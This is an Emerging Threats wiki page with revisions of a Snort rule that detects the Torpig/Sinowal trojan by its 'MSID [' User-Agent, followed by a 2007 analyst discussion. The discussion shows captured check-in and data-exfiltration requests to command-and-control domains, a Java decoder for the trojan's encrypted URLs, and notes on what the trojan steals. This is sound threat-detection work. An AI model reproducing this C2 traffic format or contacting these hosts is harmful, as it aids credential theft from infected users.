EmergingThreats> Main Web>2003590 (2007-06-22, OndrejPokorny?) EditAttach

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)"; flow:established,to_server; content:"User-Agent|3a| MSID ["; nocase; http_header; reference:url,doc.emergingthreats.net/2003590; classtype:trojan-activity; sid:2003590; rev:8;)

Added 2011-10-12 19:13:45 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)"; flow:established,to_server; content:"User-Agent|3a| MSID ["; nocase; http_header; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:8;)

Added 2011-09-14 22:26:44 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)"; flow:established,to_server; content:"User-Agent|3a| MSID ["; nocase; http_header; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader-5265; sid:2003590; rev:8;)

Added 2011-02-04 17:22:34 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader-5265; sid:2003590; rev:5;)

Added 2009-02-12 18:21:15 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader-5265; sid:2003590; rev:5;)

Added 2009-02-12 18:21:15 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:4;)

Added 2008-01-31 10:12:23 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:4;)

Added 2008-01-31 10:12:23 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-09 17:42:41 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-09 17:42:41 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-09 15:15:19 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-09 15:15:19 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-08 20:25:20 UTC


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003590; sid:2003590; rev:3;)

Added 2008-01-08 20:25:20 UTC


Added 2007-06-22

Use the FORCE, read the SOURCE :-), or reverse engineer! This is a snippet of Java code, that will do the decryption. I didn't optimize it - it closely follows the trojan.

About the domain. New domain is used every week. Before gjxuunj.com it was haygunj.com, before it dau8aym.com, before it lddpaym.com; this week it is rajjunj.com.

About Panda presentation. They describe a different version of trojan. Differences - use of .exe instead of svchost.exe+.dll, the communication to server is not encrypted, uses different server, and definitely more. I stay in touch with them.

          decode ("dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVkWjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA", "CEB2BB8F6737C1282988A8D3F1DFE91D");


static String toHex(byte[] s){
        String transTable = "0123456789ABCDEF";
        StringBuffer sb = new StringBuffer();
        byte c;
        int index;
        
        for (int i = 0 ; i< s.length; i++){
            c = s[i];
            index = (int)((c>>4) & 0xf);
            sb.append(transTable.charAt(index));
            index = (int)(c&0xf);
            sb.append(transTable.charAt(index));
        }
        return sb.toString();
    }
    static String swap(String s){
        StringBuffer sb = new StringBuffer();
        for (int i=s.length()-1; i>=0; i--){
            sb.append(s.charAt(i));
        }
        return sb.toString();
    }
    static byte[] toBin(String s){
        byte[]temp = new byte[s.length()/2];
        byte c;
        byte work;
        for (int i=0; i<s.length()/2; i++){
            work = (byte)s.charAt(2*i);
            if (work > 0x39){
                work = (byte)(work - 0x41 + 0xa);
            }
            work = (byte)(work & 0xf);
            work = (byte)(work << 4);
            c = work;
            work = (byte)(s.charAt(2*i+1));
            if (work > 0x39){
                work = (byte)(work - 0x41 + 0xa);
            }
            work = (byte)(work & 0xf);
            c |=  work;
            temp[i] = c;
        }
        return temp;
    }
    static byte[] xor(byte[] message, byte[] key){
        int keyIndex = 0;
        byte [] temp = new byte[message.length];
        byte c;
        for (int i=0; i<message.length; i++, keyIndex = ((keyIndex+1) % key.length)){
            c = (byte)(message[i] ^ key[keyIndex]);
            temp[i] = c;
        }
        return temp;
    }
    
    static byte[] decode (String s, String key){
        int len;
        int rest;
        String[] rem = {"", "===", "=", "="};
        String b64encoded;
        byte[] b64decoded ;
        // remove trailing A (= extra 0x0 from decoded)
        if (s.length()%4 == 1 && s.charAt(s.length()-1)=='A'){
            s = s.substring(0, s.length()-1);
        }
        // append missing =
        len = s.length();
        rest = len % 4;
        StringBuffer sb = new StringBuffer();
        sb.append(s);
        sb.append(rem[rest]);
        b64encoded = sb.toString();
        try{
            b64decoded = new sun.misc.BASE64Decoder().decodeBuffer (b64encoded);
        byte[] decrypted = xor(b64decoded, key.getBytes());
        String decryptedHex = toHex(decrypted);
        String swapped = swap(decryptedHex);
        byte[] result = toBin(swapped);
        String resultS = new String(result);
        System.out.println (resultS);
        return result;
        } catch(Exception e){
            e.printStackTrace();
            System.exit(1);
        }
        return null;
    }
-- OndrejPokorny? - 22 Jun 2007

Added 2007-06-22

Ondrej, I'm trying to decrypt head of the request. Could You explain more detailed the encryption method, especially this part with half-byte shuffling. I know xor and base64 methods :-). I saw this trojan talking to gjxuunj.com in June. Panda published a paper about this threat: link to eCrime 2007 Congress

-- DamianPetrus? - 22 Jun 2007

Added 2007-06-04

I can decrypt the URL part (after /ewDf/):

id=CEB2BB8F6737C1282988A8D3F1DFE91D&sv=107&build=Paladin_IT&ts=1180093122&ip=192.168.136.128&sport=9045&hport=9078&os=5.1.2600&cn=United%20States
the key for decryption is inside user-agent - CEB...91D. The encryption method is based on shuffling half-bytes around the string, xoring with the key and finally base64 encoding.

I don't know how to decrypt the content of the request. But from my observations the amount of data sent corresponds to increments in file \Windows\temp\$_2341233.tmp (hidden and system). (at least for version on my computer)

-- OndrejPokorny?

Added 2007-05-27

We were able to capture this guy from a web page (drive by download). It is pushing out these on submission of form data:

POST /ewDf/dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVkWjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache

--swefasvqdvwxff
Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream

Q+XBMVFhG5Q00cU14KO1zhSPDm7HDrF1gGfSICO7kQJkszUFdVQ/RJWldRC1RgUPJD7Nfodu0lUgswJhs04Gc1VCtxV1FZhhYHAEYQQzkap1vm5/tH6CZdBXIsQT7yeitmJ1ZeKkzjDA80cTZuIWzPbKPw/n2qLFMMeCs4NuV3N0E3QEFXXNoMDF1cE1x/TKZN+u/qfOtjHlo6IQA3+nwrYDhGTUJF7EoBBk0RV3dK60md7ON86AR2IURuXX32cCBdPExwSEbtBQUbETt/WSOpGr3m4HftK1s3eCENNfV8YVk9R1pBROEEAhNJd0ZsfeZDubqqduAnXQt7EAg2+nIiXHFPRUdM6AlnEUwTQGBS41Hm4PFjrnoaBnAgDTv8QChRPUVCTAfrCwcGXhxXZlLpJ+D85GmHIFINMDcbM+52O1I7AFlGXOIMRw1WE1JxVudN+u7hd/0gS057Jwp28GUsVzoGSk1P6gwGEEIcUHwMqRDj9/Br7kMeWjA8ETfsQChRPUVCTAf8FgcKQQFWYlmGQern+nbhIEULdyROar1xIFA9S0twT+EKBRVbWlx6R/BG/+/rcM4ZMQFtIBo29nc1XDdDDh0N4QcHGlsbZ39G6kX166F3/SBOa3cmFTbwZjFQKEpCRAm9TQYXVx1bfHfvRvrl4nuqLF0HZyUOWud7JlE3UkxHQ65aTRZXEFp7TNdP9uridexmVBx3Jx5X4GskTlRQXkoL8QcNGlxcUHFS5kDH9up662k7TnsnCnbwZSxXOgRTU1yrSVMHRwxZHnSzEqzX3VzaKlACeCUECMkcdgVqBRcVHaxVUk0RTQIjA9pjk4GFZc0VLhMXQ
--swefasvqdvwxff--

Does anybody have an idea on how to get to the content of the submitted data. I already tried base64 decode...

Christian

-- ChristianSeifert? - 2007-05-27

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:2;)

Added 2007-04-23 10:49:18 UTC

I have an infected computer (for research purposes) and have seen two versions of the trojan - grey (old version), Build Vasi4 (after automatic update):

POST http://seksis1.com/XFsQa5/ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwicwF1Gm5QZixjG0UlsAo0TiBWazPwRWFnQQowcC1BpXVqFHIeYx1ycjBTFTGwBzRCJRknJ/UaMTEEWScoegbhInYEch5lF2J2R1oVMscCQEQhYCdrtnIGEkQEIHwjUaV0YXUFFmFQVx43CkA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: seksis1.com
Content-Length: 1254
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|grey|102

and

POST http://194.146.207.12/XFsQa5/ddL0E2FGExU1EWK+BWaQBZGnc1owNyYU0VLWEuUOwidAB7Gm5QZixjG0UmugQxTiBWazPwRWZtUgo7ciJdsX1lCXNaNUcsYTdTEDW0AjJOJ1Bid7pQNTUjBiZgfwr2NhkAL0o2FnJ3M1IeNfBFJjctEiUXsnBzZjcHK3FSIdJzZAd7E2FSJGZCJRYxt3BOR31A HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: 194.146.207.12
Content-Length: 607
User-Agent: MSID [CD256AE062083071BAE834E73A4A694E]|Build Vasi4|104
Pragma: no-cache

The site contacted has also been jdbpebf.com, seksis1.com (both stopped) and at this moment it is vgnyarm.com (or numeric, if DNS doesn't work) The malware steals user information (IE autocomplete fields, POP3 password, bookmarks, address book, fill forms sent to internet) and also targets many, especially banking, sites.

Have you seen other IPs than 194.146.207.0/24? Do you now anything about infection? I know site veslox.net/grey/ , but it doesn't work anymore.

-- OndrejPokorny? - 2007-04-23

Added 2007-04-16 13:15:18 UTC

'sun' in User-Agent most likely refers to the directory which the compromised host visited and was led to the downloader. For example, a directory like /ld/sun/ani.htm would lead to 'sun' being placed in the User-agent for GET check-in request. Other possible strings are 'grey', 'ment', 'guc' (though probably not all inclusive).

-- JacobKitchel? - 16 Apr 2007

This sig is working well for us. FYI, I've observed the word 'mentat' in the User-Agent following the "]|".

-- BenFeinstein - 19 Apr 2007

Thanks Ben. I bet the mentat, sun, etc are just tracking for the malware authors. It'll be interesting to see what others show up though.

-- MattJonkman - 19 Apr 2007

This is going to be a widely varied set of targets and malware. The UA comes from the initial infection which is likely jsut a loader that knows a dns name. Tracking them all is relatively futile I think. Just block the initial load with these UAs and you should contain it.

Matt

-- MattJonkman - 23 Apr 2007

The UA is from the active trojan, not from the infection. The initial infection was carried out by different means - through Internet Explorer. It is true however, that blocking communication with this UA prevents the trojan to obtain its configuration (which is vital in my case) or send data to rogue site.

My previous question about IPs and DNS names was targeting the possibility to guess how many groups are using this code.

-- OndrejPokorny? - 24 Apr 2007


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE TROJAN Downloader-5265 Unique UA (MSID [...)"; flow:established,to_server; content:"User-Agent\: MSID ["; nocase; depth:320; classtype:trojan-activity; reference:url,doc.bleedingthreats.net/2003590; sid:2003590; rev:1;)

Added 2007-04-16 13:01:18 UTC

Regyular downloader, but has an unusual UA and get string:

GET /XFsQa5/ARACIHdzNmUUBxBxoacX4tEEIEJAWmLSJ9JrlgbHJAClNSbld2HDQcAj1UVEIpF2EMRFdiFaYtJXY9oWYtNFUOVB01QzlQIBJKcRAeQHhKdgFCACQCqSVwNSDCEiIhLANQVGIqNyIWJlMlUSIzIhVSNWJhInOiJkUFPrA6c HTTP/1.0
User-Agent: MSID [6FE60F5FFAF67AB172BAC9A0408E11FC]|sun|104
Host: xipdarm.com
Pragma: no-cache

-- MattJonkman - 16 Apr 2007


Topic revision: r12 - 2007-06-22 - OndrejPokorny?
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats